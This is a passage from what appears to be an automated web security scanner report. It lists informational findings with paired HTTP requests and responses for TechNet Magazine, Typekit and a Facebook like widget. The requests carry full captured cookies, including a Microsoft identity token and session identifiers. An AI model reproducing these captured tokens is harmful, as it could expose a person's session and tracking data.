Cookie: MC1=GUID=688642bf9d16e14b952901540959fda0&HASH=bf42&LV=20112&V=3; MUID=FA3AE6176FAC4414AD6FC26C726B4B15; BPFC=:en:; CommunityServer-UserCookie2101=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Tue%2c+01+Mar+2011+15%3a49%3a43+GMT; __unam=289c965-12e721b8405-5ba8ac9c-2; _opt_vi_LECG2UZC=70FF57B5-618B-4C89-A6E0-AEEFB08346CB; R=200027254-3/8/2011 14:53:52; _opt_vi_06F86FDK=742B89EE-F086-4032-9920-451B209CBC09; msdn=L=1033; WT_NVR_RU=0=technet|msdn:1=:2=; MSID=Microsoft.CreationDate=02/15/2011 21:42:53&Microsoft.LastVisitDate=03/26/2011 00:57:21&Microsoft.VisitStartDate=03/26/2011 00:57:21&Microsoft.CookieId=cdefcdbc-cd58-426e-a2b9-6d4d032c5554&Microsoft.TokenId=0242265b-d73d-484f-a494-b6344e553cef&Microsoft.NumberOfVisits=23&Microsoft.IdentityToken=plYFWp/Sav9RboFYJDENknWK0M3HKGRxExSO3ZthrhvxePoaRD543/4jCDtpABDhXvGu6hYw2p7w2OmmFcnnIATCsqP2cDLpwOaak2MSqpcwaZgium6WkbxRI/3lfq0Gws5gcoTO900VpbrWwnZWkk0h7DvuOUy8fvvcOIGUata8oggRE3IuQrAHBEdOSC/VqwuxZuA8KPU+oVMW2WeVUbt/xABiD8cXjH/eMrCCuxuZz35IbR8vQoULMMLVcABNmxQVsXvFb9OdB+JXJYi7RA0KQqL3iTcg1W/EF1rgR0gVqEcUWJN4qVllIbUGiU8N0wicUcjkNMpnYKw6LUumclx6R3aZQ45I51JtrotJDDVuP0DWwWnW13onH24nmUTXBZBOheXFYzynksZs2l8NLvKjXhpdbbc9j9a1dbb4rMVVXHpY30MRfbCM47a1gnmlVVOW+qUz6A30GY5CvEOLiGN25+nvYeNS7r4egZVUUXGtCCTuwHLaMByKYLNBjzcYx+KFLbPw3vUTZZB9kkHuQTlG3YCkF73XUqeC+mr8Xi8=&Microsoft.MicrosoftId=0189-2123-7087-5274&Microsoft.CookieFirstVisit=1; _opt_vi_DANG4OLL=49D92CA5-D4F7-41F0-8DD6-1130EED19BA3; _opt_vt_DANG4OLL=202FA024DB; Sto.UserLocale=en-us; ADS=SN=175A21EF; WT_NVR=0=/:1=en-us:2=en-us/security|en-us/subscriptions|en-us/evalcenter|en-us/magazine:3=en-us/subscriptions/downloads; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1301103723737%7D%2C%22lastinvited%22%3A1301103723737%2C%22userid%22%3A%2213011037237379667073420714586%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; omniID=ue; s_cc=true; WT_FPC=id=173.193.214.243-1295665472.30133593:lv=1301092937570:ss=1301092848759; MS0=2a3c4c9fe97247d48c9a5163057b9a69; A=I&I=AxUFAAAAAAAABwAADIe+FnxFI293k92k7DipMA!!&CS=126gi]0001:@E0I02h:@E0I; s_sq=msstotn%2Cmsstotnonly%2Cmsstotnmktenus%2Cmsstotncentroll%2Cmsstotnctmag%3D%2526pid%253Dtechnet%25253A/en-us/magazine/gg703766%2526pidt%253D1%2526oid%253Dhttp%25253A//technet.microsoft.com/en-us/magazine/ff426023.aspx%2526ot%253DA

Response 2

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 26 Mar 2011 01:44:02 GMT
Content-Length: 47821


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head"><link
...[SNIP]...
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUBMGQYMQVHY3RsMDAkTVRDb250ZW50U2VsZWN0b3IxJG1haW5Db250ZW50Q29udGFpbmVyJGR5bmFtaWNtYWdhemluZVUkQ29kZVZpZXcPZ2QFSGN0bDAwJE1UQ29udGVudFNlbGVjdG9yMSRtYWluQ29udGVudENvbnRhaW5lciRkeW5hbWljbWFnYXppbmVJJEluZGV4Vmlldw8UKwAOZGRkZGRkZDwrAAYAAgZkZGRmAv////8PZAVKY3RsMDAkTVRDb250ZW50U2VsZWN0b3IxJG1haW5Db250ZW50Q29udGFpbmVyJGR5bmFtaWNtYWdhemluZUIkUmVzdWx0c1ZpZXcPZ2QFR2N0bDAwJE1UQ29udGVudFNlbGVjdG9yMSRtYWluQ29udGVudENvbnRhaW5lciRkeW5hbWljbWFnYXppbmVFJENvZGVWaWV3D2dkBUdjdGwwMCRNVENvbnRlbnRTZWxlY3RvcjEkbWFpbkNvbnRlbnRDb250YWluZXIkZHluYW1pY21hZ2F6aW5lRCRDb2RlVmlldw9nZAVKY3RsMDAkTVRDb250ZW50U2VsZWN0b3IxJG1haW5Db250ZW50Q29udGFpbmVyJGR5bmFtaWNtYWdhemluZVUkUmVzdWx0c1ZpZXcPZ2QFSGN0bDAwJE1UQ29udGVudFNlbGVjdG9yMSRtYWluQ29udGVudENvbnRhaW5lciRkeW5hbWljbWFnYXppbmVVJEluZGV4Vmlldw8UKwAOZGRkZGRkZBQrAAFkAgFkZGRmAv////8PZAVKY3RsMDAkTVRDb250ZW50U2VsZWN0b3IxJG1haW5Db250ZW50Q29udGFpbmVyJGR5bmFtaWNtYWdhemluZUwkUmVzdWx0c1ZpZXcPZ2QFSmN0bDAwJE1UQ29udGVudFNlbGVjdG9yMSRtYWluQ29udGVudENvbnRhaW5lciRkeW5hbWljbWFnYXppbmVJJFJlc3VsdHNWaWV3D2dkBUpjdGwwMCRNVENvbnRlbnRTZWxlY3RvcjEkbWFpbkNvbnRlbnRDb250YWluZXIkZHluYW1pY21hZ2F6aW5lVCRSZXN1bHRzVmlldw9nZAVHY3RsMDAkTVRDb250ZW50U2VsZWN0b3IxJG1haW5Db250ZW50Q29udGFpbmVyJGR5bmFtaWNtYWdhemluZUckQ29kZVZpZXcPZ2QFSmN0bDAwJE1UQ29udGVudFNlbGVjdG9yMSRtYWluQ29udGVudENvbnRhaW5lciRkeW5hbWljbWFnYXppbmVPJFJlc3VsdHNWaWV3D2dkBUdjdGwwMCRNVENvbnRlbnRTZWxlY3RvcjEkbWFpbkNvbnRlbnRDb250YWluZXIkZHluYW1pY21hZ2F6aW5lUCRDb2RlVmlldw9nZAVKY3RsMDAkTVRDb250ZW50U2VsZWN0b3IxJG1haW5Db250ZW50Q29udGFpbmVyJGR5bmFtaWNtYWdhemluZUgkUmVzdWx0c1ZpZXcPZ2QFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYBBSJjdGwwMCRNYXN0aGVhZCRTZWFyY2gkU2VhcmNoQnV0dG9uBUpjdGwwMCRNVENvbnRlbnRTZWxlY3RvcjEkbWFpbkNvbnRlbnRDb250YWluZXIkZHluYW1pY21hZ2F6aW5lUCRSZXN1bHRzVmlldw9nZAVKY3RsMDAkTVRDb250ZW50U2VsZWN0b3IxJG1haW5Db250ZW50Q29udGFpbmVyJGR5bmFtaWNtYWdhemluZUYkUmVzdWx0c1ZpZXcPZ2QFR2N0bDAwJE1UQ29udGVudFNlbGVjdG9yMSRtYWluQ29udGVudENvbnRhaW5lciRkeW5hbWljbWFnYXppbmVSJENvZGVWaWV3D2dkBUdjdGwwMCRNVENvbnRlbnRTZWxlY3RvcjEkbWFpbkNvbnRlbnRDb250YWluZXIkZHluYW1pY21hZ2F6aW5lTCRDb2RlVmlldw9nZAVIY3RsMDAkTVRDb250ZW50U2VsZWN0b3IxJG1haW5Db250ZW50Q29udG
...[SNIP]...
18.6. http://technet.microsoft.com/en-us/magazine/gg703766.aspx  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://technet.microsoft.com
Path:   /en-us/magazine/gg703766.aspx

Request 1

GET /en-us/magazine/gg703766.aspx HTTP/1.1
Host: technet.microsoft.com
Proxy-Connection: keep-alive
Referer: http://technet.microsoft.com/en-us/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=688642bf9d16e14b952901540959fda0&HASH=bf42&LV=20112&V=3; MUID=FA3AE6176FAC4414AD6FC26C726B4B15; BPFC=:en:; A=I&I=AxUFAAAAAAAABwAADIe+FnxFI293k92k7DipMA!!&CS=126gi600017030E02h7030E; WT_NVR=0=/:1=en-us:2=en-us/security|en-us/subscriptions|en-us/evalcenter:3=en-us/subscriptions/downloads; CommunityServer-UserCookie2101=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Tue%2c+01+Mar+2011+15%3a49%3a43+GMT; __unam=289c965-12e721b8405-5ba8ac9c-2; _opt_vi_LECG2UZC=70FF57B5-618B-4C89-A6E0-AEEFB08346CB; R=200027254-3/8/2011 14:53:52; _opt_vi_06F86FDK=742B89EE-F086-4032-9920-451B209CBC09; msdn=L=1033; WT_NVR_RU=0=technet|msdn:1=:2=; MSID=Microsoft.CreationDate=02/15/2011 21:42:53&Microsoft.LastVisitDate=03/26/2011 00:57:21&Microsoft.VisitStartDate=03/26/2011 00:57:21&Microsoft.CookieId=cdefcdbc-cd58-426e-a2b9-6d4d032c5554&Microsoft.TokenId=0242265b-d73d-484f-a494-b6344e553cef&Microsoft.NumberOfVisits=23&Microsoft.IdentityToken=plYFWp/Sav9RboFYJDENknWK0M3HKGRxExSO3ZthrhvxePoaRD543/4jCDtpABDhXvGu6hYw2p7w2OmmFcnnIATCsqP2cDLpwOaak2MSqpcwaZgium6WkbxRI/3lfq0Gws5gcoTO900VpbrWwnZWkk0h7DvuOUy8fvvcOIGUata8oggRE3IuQrAHBEdOSC/VqwuxZuA8KPU+oVMW2WeVUbt/xABiD8cXjH/eMrCCuxuZz35IbR8vQoULMMLVcABNmxQVsXvFb9OdB+JXJYi7RA0KQqL3iTcg1W/EF1rgR0gVqEcUWJN4qVllIbUGiU8N0wicUcjkNMpnYKw6LUumclx6R3aZQ45I51JtrotJDDVuP0DWwWnW13onH24nmUTXBZBOheXFYzynksZs2l8NLvKjXhpdbbc9j9a1dbb4rMVVXHpY30MRfbCM47a1gnmlVVOW+qUz6A30GY5CvEOLiGN25+nvYeNS7r4egZVUUXGtCCTuwHLaMByKYLNBjzcYx+KFLbPw3vUTZZB9kkHuQTlG3YCkF73XUqeC+mr8Xi8=&Microsoft.MicrosoftId=0189-2123-7087-5274&Microsoft.CookieFirstVisit=1; _opt_vi_DANG4OLL=49D92CA5-D4F7-41F0-8DD6-1130EED19BA3; _opt_vt_DANG4OLL=202FA024DB; Sto.UserLocale=en-us; ADS=SN=175A21EF; omniID=ue; s_cc=true; WT_FPC=id=173.193.214.243-1295665472.30133593:lv=1301092848759:ss=1301092848759; s_sq=%5B%5BB%5D%5D

Response 1

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 26 Mar 2011 01:40:25 GMT
Content-Length: 45746


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head"><link
...[SNIP]...
<\/scr"+"ipt>");}
/*]]>*/
var detectedLocale = 'en-us';
var wtsp="_technet_technetmag_";
var gTrackEvents = 1;
var omni_guid='c66550ea-16a1-4a5d-9a0f-1e798079cba9';//]]>
</script>
<script src='http://i2.technet.microsoft.com/platform/Controls/Omniture/resources/TechNet/omni_rsid_technet-bn20110314.js' type='text/javascript'></script><noscript><a href='http://www.omniture.com' title='Web Analytics'><img src='http://msstonojstechnet.112.2o7.net/b/ss/msstonojstechnet/1/H.20.2--NS/0' height='1' width='1' border='0' alt='' /></a></noscript>
<script type="text/javascript">
//<![CDATA[
$(document).ready(function() { var sf = "a[@rel$='sitefeedback']"; if ($(sf) == null) return; $(sf).click(function() { var t = $(this).attr('targetUrl'); window.open(t,'SiteFeedback','width=670,resizable=no,height=700,toolbar=no,location=no,scrollbars=yes,directories=no,status=no,menubar=no'); return false; }); });//]]>
</script>

<script src="http://i2.technet.microsoft.com/platform/cjs/extract/compositejscript3.js" type="text/javascript"></script>
<script type="text/javascript">
//<![CDATA[
Sys.WebForms.PageRequestManager._initialize('ctl00$ScriptManager', 'aspnetForm', [], [], [], 90, 'ctl00');
//]]>
</script>

<div id="ctl00_checkFlyer">

</div>



<div id="BodyBackground">
<div id="ctl00_JelloSizer" class="JelloSizer">
<div id="JelloExpander">
<div id="ctl00_JelloWrapper" class="JelloWrapper">

<div class="Clear"> </div>


<div class="Masthead">
<div id="ctl00_Masthead_brandLogo" class="BrandLogo">
<a href="/en-us/magazine/default.aspx" id="ctl00_Masthead_brandlink" title="TechNet Magazine">TechNet Magazine</a>
</div>
<div class="Search">
<div id="ctl00_Masthead_Search_SearchBox" class="SearchBox">
<input name="ctl00$Masthead$Search$SearchTextBox" type="text" id="ctl00_Masthead_Search_SearchTextBox" title="Search TechNet" class="TextBoxSearch" />
<input typ
...[SNIP]...

Request 2

GET /en-us/magazine/gg703766.aspx HTTP/1.1
Host: technet.microsoft.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=688642bf9d16e14b952901540959fda0&HASH=bf42&LV=20112&V=3; MUID=FA3AE6176FAC4414AD6FC26C726B4B15; BPFC=:en:; A=I&I=AxUFAAAAAAAABwAADIe+FnxFI293k92k7DipMA!!&CS=126gi600017030E02h7030E; WT_NVR=0=/:1=en-us:2=en-us/security|en-us/subscriptions|en-us/evalcenter:3=en-us/subscriptions/downloads; CommunityServer-UserCookie2101=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Tue%2c+01+Mar+2011+15%3a49%3a43+GMT; __unam=289c965-12e721b8405-5ba8ac9c-2; _opt_vi_LECG2UZC=70FF57B5-618B-4C89-A6E0-AEEFB08346CB; R=200027254-3/8/2011 14:53:52; _opt_vi_06F86FDK=742B89EE-F086-4032-9920-451B209CBC09; msdn=L=1033; WT_NVR_RU=0=technet|msdn:1=:2=; MSID=Microsoft.CreationDate=02/15/2011 21:42:53&Microsoft.LastVisitDate=03/26/2011 00:57:21&Microsoft.VisitStartDate=03/26/2011 00:57:21&Microsoft.CookieId=cdefcdbc-cd58-426e-a2b9-6d4d032c5554&Microsoft.TokenId=0242265b-d73d-484f-a494-b6344e553cef&Microsoft.NumberOfVisits=23&Microsoft.IdentityToken=plYFWp/Sav9RboFYJDENknWK0M3HKGRxExSO3ZthrhvxePoaRD543/4jCDtpABDhXvGu6hYw2p7w2OmmFcnnIATCsqP2cDLpwOaak2MSqpcwaZgium6WkbxRI/3lfq0Gws5gcoTO900VpbrWwnZWkk0h7DvuOUy8fvvcOIGUata8oggRE3IuQrAHBEdOSC/VqwuxZuA8KPU+oVMW2WeVUbt/xABiD8cXjH/eMrCCuxuZz35IbR8vQoULMMLVcABNmxQVsXvFb9OdB+JXJYi7RA0KQqL3iTcg1W/EF1rgR0gVqEcUWJN4qVllIbUGiU8N0wicUcjkNMpnYKw6LUumclx6R3aZQ45I51JtrotJDDVuP0DWwWnW13onH24nmUTXBZBOheXFYzynksZs2l8NLvKjXhpdbbc9j9a1dbb4rMVVXHpY30MRfbCM47a1gnmlVVOW+qUz6A30GY5CvEOLiGN25+nvYeNS7r4egZVUUXGtCCTuwHLaMByKYLNBjzcYx+KFLbPw3vUTZZB9kkHuQTlG3YCkF73XUqeC+mr8Xi8=&Microsoft.MicrosoftId=0189-2123-7087-5274&Microsoft.CookieFirstVisit=1; _opt_vi_DANG4OLL=49D92CA5-D4F7-41F0-8DD6-1130EED19BA3; _opt_vt_DANG4OLL=202FA024DB; Sto.UserLocale=en-us; ADS=SN=175A21EF; omniID=ue; s_cc=true; WT_FPC=id=173.193.214.243-1295665472.30133593:lv=1301092848759:ss=1301092848759; s_sq=%5B%5BB%5D%5D

Response 2

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 26 Mar 2011 01:41:56 GMT
Content-Length: 45694


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head"><link
...[SNIP]...
<\/scr"+"ipt>");}
/*]]>*/
var detectedLocale = 'en-us';
var wtsp="_technet_technetmag_";
var gTrackEvents = 1;
var omni_guid='8e433878-c118-45b4-81e9-9f9b3404a27a';//]]>
</script>
<script src='http://i2.technet.microsoft.com/platform/Controls/Omniture/resources/TechNet/omni_rsid_technet-bn20110314.js' type='text/javascript'></script><noscript><a href='http://www.omniture.com' title='Web Analytics'><img src='http://msstonojstechnet.112.2o7.net/b/ss/msstonojstechnet/1/H.20.2--NS/0' height='1' width='1' border='0' alt='' /></a></noscript>
<script type="text/javascript">
//<![CDATA[
$(document).ready(function() { var sf = "a[@rel$='sitefeedback']"; if ($(sf) == null) return; $(sf).click(function() { var t = $(this).attr('targetUrl'); window.open(t,'SiteFeedback','width=670,resizable=no,height=700,toolbar=no,location=no,scrollbars=yes,directories=no,status=no,menubar=no'); return false; }); });//]]>
</script>

<script src="http://i2.technet.microsoft.com/platform/cjs/extract/compositejscript3.js" type="text/javascript"></script>
<script type="text/javascript">
//<![CDATA[
Sys.WebForms.PageRequestManager._initialize('ctl00$ScriptManager', 'aspnetForm', [], [], [], 90, 'ctl00');
//]]>
</script>

<div id="ctl00_checkFlyer">

</div>



<div id="BodyBackground">
<div id="ctl00_JelloSizer" class="JelloSizer">
<div id="JelloExpander">
<div id="ctl00_JelloWrapper" class="JelloWrapper">

<div class="Clear"> </div>


<div class="Masthead">
<div id="ctl00_Masthead_brandLogo" class="BrandLogo">
<a href="/en-us/magazine/default.aspx" id="ctl00_Masthead_brandlink" title="TechNet Magazine">TechNet Magazine</a>
</div>
<div class="Search">
<div id="ctl00_Masthead_Search_SearchBox" class="SearchBox">
<input name="ctl00$Masthead$Search$SearchTextBox" type="text" id="ctl00_Masthead_Search_SearchTextBox" title="Search TechNet" class="TextBoxSearch" />
<input typ
...[SNIP]...
18.7. http://use.typekit.com/k/lvr1wgh-b.css  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://use.typekit.com
Path:   /k/lvr1wgh-b.css

Request 1

GET /k/lvr1wgh-b.css?3bb2a6e53c9684ffdc9a9afe195b2a6290e57de54ffd90397ef00df106bb58c0ad0fc682e0a5cc8f85d1c87f5256e0cc83fca38f519a4d0b526f1db5d318cd58d3c860823f76a926db0abb1ee80100663f2923 HTTP/1.1
Host: use.typekit.com
Proxy-Connection: keep-alive
Referer: http://www.cramerdev.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 200 OK
Accept-Ranges: bytes
Cache-Control: max-age=300
Content-Type: text/css
Date: Fri, 25 Mar 2011 19:24:16 GMT
ETag: "2297121751+gzip"
Expires: Fri, 25 Mar 2011 19:29:16 GMT
Last-Modified: Tue, 24 Aug 2010 12:27:21 GMT
Server: ECS (dca/533D)
Vary: Accept-Encoding
X-Cache: HIT
Content-Length: 123907

/*{"created":"2010-08-24T12:27:24Z","k":"0.7.11","mac":"1:248a5044a541b008b319bae335a01041740eb2949b2e019a8054f06e42ddb22c","version":"633991"}*/
/*
* The fonts and font delivery service used on this website are provided via
* Typekit, and are subject to the End User License Agreement entered into by
* the website owner. All other parties are explicitly restricted from using,
* in any manner, the Services, Licensed Fonts, or Licensed Content. Details
* about using Typekit, the EULA, and information about the fonts are listed
* below.
*
* @allow http://cramerdev.com
* @allow http://www.cramerdev.com
*
* @name Museo
* @vendorname exljbris Font Foundry
* @vendorurl http://www.josbuivenga.demon.nl/index.html
* @licenseurl http://typekit.com/fonts/da8e320746/eula
*
* @name Ronnia Web Condensed
* @vendorname TypeTogether
* @vendorurl http://www.type-together.com/
* @licenseurl http://typekit.com/fonts/049672f902/eula
*
* (c) 2010 Small Batch Inc.
*/

@font-face {
font-family:"museo-1";
src:url(data:font/opentype;base64,AAEAAAASAQAABAAgRkZUTU/7yegAAG7UAAAAHEdERUYB/AEAAABZeAAAACxHUE9TM6bvDAAAWiAAABS0R1NVQiF8GxsAAFmkAAAAfE9TLzJ/UKW2AAABqAAAAGBjbWFwwl6DUAAABTgAAAJ0Y3Z0IAFQBTgAAApEAAAADGZwZ20PtC+nAAAHrAAAAmVnYXNw//8AAwAAWXAAAAAIZ2x5ZkQ3sM0AAAvsAABJNGhlYWTznVuDAAABLAAAADZoaGVhBzoDlAAAAWQAAAAkaG10eK1kIV0AAAIIAAADMGxvY2Hy3OE4AAAKUAAAAZptYXhwAekAfwAAAYgAAAAgbmFtZX9KU3kAAFUgAAACjnBvc3ShSJ8eAABXsAAAAb9wcmVwsPIrFAAAChQAAAAuAAEAAAACAIOOjMOaXw889QALA+gAAAAAyHkLvQAAAADIeQu9/+v/LgOgA3MAAAAIAAIAAAAAAAAAAQAAA6z+/AAAA9D/6//7A6AAAQAAAAAAAAAAAAAAAAAAAMwAAQAAAMwATQAFAAAAAAACAAEAAgAWAAABAAAuAAAAAAACAc0BLAAFAAICvAKKAAAAjAK8AooAAAHdADIA+gAAAgAAAAAAAAAAAKAAAK9AAABK
...[SNIP]...

Request 2

GET /k/lvr1wgh-b.css?3bb2a6e53c9684ffdc9a9afe195b2a6290e57de54ffd90397ef00df106bb58c0ad0fc682e0a5cc8f85d1c87f5256e0cc83fca38f519a4d0b526f1db5d318cd58d3c860823f76a926db0abb1ee80100663f2923 HTTP/1.1
Host: use.typekit.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 403 Forbidden
Cache-Control: max-age=300
Content-Type: text/html
Date: Fri, 25 Mar 2011 19:24:23 GMT
Expires: Fri, 25 Mar 2011 19:29:23 GMT
Server: ECS (dca/533D)
Content-Length: 345

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head>
       <title>403 - Forbidden</title>
   </head>
   <body>
       <h1>403 - Forbidden</h1>
   </body>
</html>
18.8. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.facebook.com
Path:   /plugins/like.php

Request 1

GET /plugins/like.php?href=http%3A%2F%2Fwww.facebook.com%2Fpages%2FFast-Reports%2F133167183399602&layout=button_count&show_faces=false&width=450&action=like&colorscheme=light&height=21 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.fast-report.com/en/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=VV5oTas0hG1hzk6eclVNNMGO; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Daolnews.com%26placement%3Dactivity%26extra_1%3Dhttp%253A%252F%252Fwww.aolnews.com%252F2011%252F03%252F24%252Fcaseworkers-charged-in-death-of-marchella-brett-pierce-abused-4%252F%26extra_2%3DUS

Response 1

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.96.49
X-Cnection: close
Date: Sat, 26 Mar 2011 12:22:26 GMT
Content-Length: 8259

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<div id="connect_widget_4d8dda82666e65487184857" class="connect_widget button_count" style=""><table class="connect_widget_interactive_area"><tr><td class="connect_widget_vertical_center connect_widget_button_cell"><div class="connect_button_slider"><div class="connect_button_container"><a class="connect_widget_like_button clearfix like_button_no_like"><div class="hidden_elem"></div><span class="liketext">Like</span></a></div></div></td><td class="connect_widget_vertical_center connect_widget_confirm_cell"><span class="connect_widget_confirm_span hidden_elem"><a class="mrm connect_widget_confirm_link">Confirm</a></span></td><td class="connect_widget_button_count_including hidden_elem"><table class="uiGrid connect_widget_button_count_summary" cellspacing="0" cellpadding="0"><tbody><tr><td><div class="thumbs_up"></div></td><td><div class="undo hidden_elem"><div id="undo-wrap"><!--<label class="undo_button uiCloseButton uiCloseButtonSmall" for="u214642_1"><input title="Remove" type="button" id="u214642_1" /></label>--></div></div></td><td><div class="summary_text">80 people</div></td></tr></tbody></table></td><td class="connect_widget_button_count_excluding"><table class="uiGrid" cellspacing="0" cellpadding="0"><tbody><tr><td><div class="connect_widget_button_count_nub"><s></s><i></i></div></td><td><div class="connect_widget_button_count_count">79</div></td></tr></tbody></table></td></tr></table></div><script type="text/javascript">
Env={module:"like_widget",impid:"fbf01e16",user:0,locale:"en_US",method:"GET",dev:0,start:(new Date()).getTime(),ps_limit:5,ps_ratio:4,svn_rev:358385,vip:"66.220.158.11",static_base:"http:\/\/static.ak.fbcdn.net\/",www_base:"http:\/\/www.facebook.com\/",tlds:["com"],rep_lag:20,pc:{"m":"1.0.4","l":"1.0.4","axi":true,"j":true,"bsz":16},fb_dtsg:"X6eem",lhsh:"67144",tracking_domain:"http:\/\/pixel.facebook.com",ajaxpipe_enabled:"1"};
</script>
<script type="text/javascript">Bootloader.setResourceMap({"F8mJ3":{"type":"css","permanent":1,"src":"http:\/\/static.ak.fbcdn.net\/r
...[SNIP]...

Request 2

GET /plugins/like.php?href=http%3A%2F%2Fwww.facebook.com%2Fpages%2FFast-Reports%2F133167183399602&layout=button_count&show_faces=false&width=450&action=like&colorscheme=light&height=21 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=VV5oTas0hG1hzk6eclVNNMGO; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Daolnews.com%26placement%3Dactivity%26extra_1%3Dhttp%253A%252F%252Fwww.aolnews.com%252F2011%252F03%252F24%252Fcaseworkers-charged-in-death-of-marchella-brett-pierce-abused-4%252F%26extra_2%3DUS

Response 2

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.21.55
